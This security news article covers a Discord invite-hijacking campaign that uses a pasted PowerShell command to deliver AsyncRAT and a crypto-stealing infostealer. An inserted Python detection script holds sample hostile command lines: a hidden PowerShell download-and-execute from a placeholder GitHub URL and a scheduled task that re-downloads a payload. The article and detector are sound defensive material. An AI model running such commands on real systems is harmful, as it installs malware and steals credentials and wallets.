Cybercriminals Exploiting Expired Discord Invite Links to Deploy Multi-Stage Malware

Security researchers have uncovered a sophisticated malware campaign exploiting a little-known flaw in Discord’s invitation system, enabling cybercriminals to hijack expired or deleted invite links and redirect unsuspecting users to malicious servers.

This attack chain, discovered by Check Point Research, leverages trusted cloud services and advanced evasion techniques to deliver powerful malware, with a particular focus on stealing cryptocurrency assets.

Attackers monitor expired or deleted Discord invite links, often shared by legitimate communities on forums or social media, and re-register these codes as custom vanity links for their own malicious servers.

When users click on what they believe to be a safe, previously trusted invite, they are seamlessly redirected to a fake Discord server controlled by the attackers.

Upon joining, users typically encounter a “verify” channel featuring a bot that prompts them to complete a verification step.

This process redirects victims to a phishing website mimicking Discord’s interface, where they are tricked into running a malicious PowerShell command copied to their clipboard.

This social engineering method, known as “ClickFix,” avoids traditional red flags by not requiring users to download files directly.

Multi-Stage Infection Chain

The PowerShell script downloads a first-stage loader from GitHub, which in turn retrieves additional encrypted payloads from Bitbucket. These payloads include:

  • AsyncRAT: An open-source remote access trojan granting attackers full control over the victim’s system, including keylogging, file management, and remote desktop access.
  • Skuld Stealer: A customized info-stealer targeting browser credentials, Discord tokens, and, crucially, cryptocurrency wallets such as Exodus and Atomic. The malware injects malicious code into wallet applications, exfiltrating seed phrases and passwords via Discord webhooks.

The campaign also employs a ChromeKatz-based module to bypass Chrome’s Application-Bound Encryption (ABE), extracting browser cookies directly from memory even on the latest versions of Chrome, Edge, and Brave.

To avoid detection, the malware uses several advanced evasion techniques:

  • Cloud-Based Payload Delivery: All malicious files are hosted on trusted platforms like GitHub, Bitbucket, and Pastebin, blending in with normal traffic.
  • Time-Based Evasion: Execution is delayed using scheduled tasks, ensuring that malicious behavior only appears after automated sandbox analysis has ended.
  • Dynamic Infrastructure: Attackers frequently update payload URLs and binaries, maintaining low antivirus detection rates and resilience against takedowns.

“Persistence is achieved by creating scheduled tasks that regularly re-download and execute the malware, making removal difficult and enabling ongoing remote access by the attackers,” the report reads.
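As a defender-side illustration of the chain described above (a pasted PowerShell one-liner that pulls a loader from GitHub or Bitbucket, followed by scheduled tasks that keep re-downloading it), here is an added Python example; it is not part of the Check Point report or of this article. It runs two detection rules over constructed process-creation records of the kind Sysmon Event ID 1 or an EDR feed would provide. The host names are the services the article names; the repository paths, task name and file names are placeholders.

```python
import ntpath
import re
from dataclasses import dataclass
from typing import Optional

# Constructed process-creation records (parent image, image, command line).
# These are illustrative samples, not telemetry from the campaign; the
# EXAMPLE-* repository paths and the task name are placeholders.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://raw.githubusercontent.com/EXAMPLE-ORG/EXAMPLE-REPO/main/stage1.txt | iex"'},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /sc minute /mo 30 /tn Updater /tr "powershell -w hidden -c iwr https://bitbucket.org/EXAMPLE-WS/EXAMPLE-REPO/downloads/update.bin"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -NoProfile -Command Get-ChildItem C:\Temp"},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks /query /tn \Microsoft\Windows\Defrag\ScheduledDefrag"},
]

# PowerShell download primitives commonly seen in pasted one-liners.
DOWNLOAD_CMDLET = re.compile(
    r"\b(?:iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile|Start-BitsTransfer)\b",
    re.IGNORECASE)
# Code-hosting and paste services the article names as payload hosts.
CLOUD_HOST = re.compile(
    r"https?://(?:raw\.githubusercontent\.com|github\.com|bitbucket\.org|pastebin\.com)/",
    re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}


@dataclass
class Alert:
    rule: str
    reason: str
    cmdline: str


def is_cloud_hosted_download(cmdline: str) -> bool:
    """True when a command both fetches from the web and names a code-hosting/paste host."""
    return bool(DOWNLOAD_CMDLET.search(cmdline) and CLOUD_HOST.search(cmdline))


def check_clickfix(event: dict) -> Optional[Alert]:
    """Rule 1: PowerShell spawned by the user's shell (explorer.exe, i.e. the Run
    dialog or a pasted command) that downloads from a code-hosting service."""
    image = ntpath.basename(event["image"]).lower()
    parent = ntpath.basename(event["parent"]).lower()
    cmdline = event["cmdline"]
    if image not in POWERSHELL_IMAGES or parent != "explorer.exe":
        return None
    if not is_cloud_hosted_download(cmdline):
        return None
    reason = "user-launched PowerShell downloading from code-hosting service"
    if HIDDEN_WINDOW.search(cmdline):
        reason += " with hidden window"
    return Alert("clickfix_cloud_download", reason, cmdline)


def check_schtasks(event: dict) -> Optional[Alert]:
    """Rule 2: a scheduled task being created whose action is a PowerShell
    download, the re-download persistence pattern the report describes."""
    image = ntpath.basename(event["image"]).lower()
    lowered = event["cmdline"].lower()
    if image != "schtasks.exe" or "/create" not in lowered or "/tr" not in lowered:
        return None
    if "powershell" not in lowered and "pwsh" not in lowered:
        return None
    if not DOWNLOAD_CMDLET.search(event["cmdline"]):
        return None
    return Alert("schtasks_redownload",
                 "scheduled task action re-downloads content via PowerShell",
                 event["cmdline"])


def analyze(events) -> list:
    """Run both rules over a sequence of process-creation records."""
    alerts = []
    for event in events:
        for rule in (check_clickfix, check_schtasks):
            alert = rule(event)
            if alert is not None:
                alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.reason}: {a.cmdline}")
```

Both rules deliberately key on the combination of a download primitive and a code-hosting domain rather than on any single URL, because the article notes that payload URLs and binaries are rotated frequently; a rule on the static indicator would go stale, while the pattern of "user shell spawns PowerShell that fetches from GitHub/Bitbucket/Pastebin" or "scheduled task whose action is a PowerShell download" survives rotation. In production, encoded commands (`-enc`) and `cmd.exe` intermediaries would need additional decoding before these regexes are applied.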

Download statistics from Bitbucket suggest the campaign has reached over 1,300 potential victims, with infections observed across the United States, Europe, and Asia.

The focus on cryptocurrency wallets and browser credentials points to financially motivated threat actors.

Discord has acted to disable the malicious verification bot involved in the campaign, disrupting the current infection chain.

However, the underlying flaw in invite link management remains exploitable, and attackers could easily adapt their methods to continue targeting users.

Mitigations

  • Avoid clicking on old or expired Discord invite links, especially those found on public forums or social media.
  • Only use permanent invite links with uppercase letters, which are more resistant to hijacking.
  • Be wary of any Discord server that requires external “verification” steps or prompts you to run commands on your computer.
  • Keep security software updated and regularly scan for malware.

This campaign underscores the importance of vigilance, even on trusted platforms, and highlights the evolving tactics of cybercriminals targeting the booming crypto sector.
